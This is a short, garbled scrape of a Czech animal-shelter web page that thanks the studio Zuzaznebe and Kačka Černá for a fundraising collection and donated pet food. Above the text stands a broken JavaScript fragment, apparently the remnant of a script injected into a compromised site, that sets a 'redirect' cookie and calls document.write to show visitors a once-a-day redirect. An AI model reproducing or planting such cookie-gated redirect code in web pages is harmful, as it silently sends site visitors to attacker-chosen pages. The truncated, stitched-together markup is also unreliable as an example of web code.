=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} " />


Děkujeme...

Zuza z nebe

Děkujeme studiu Zuzaznebe a Kačce Černé za uskutečnění sbírky a nákup krmiva pro útulek. Velice si vážíme každé pomoci..


Fotogalerie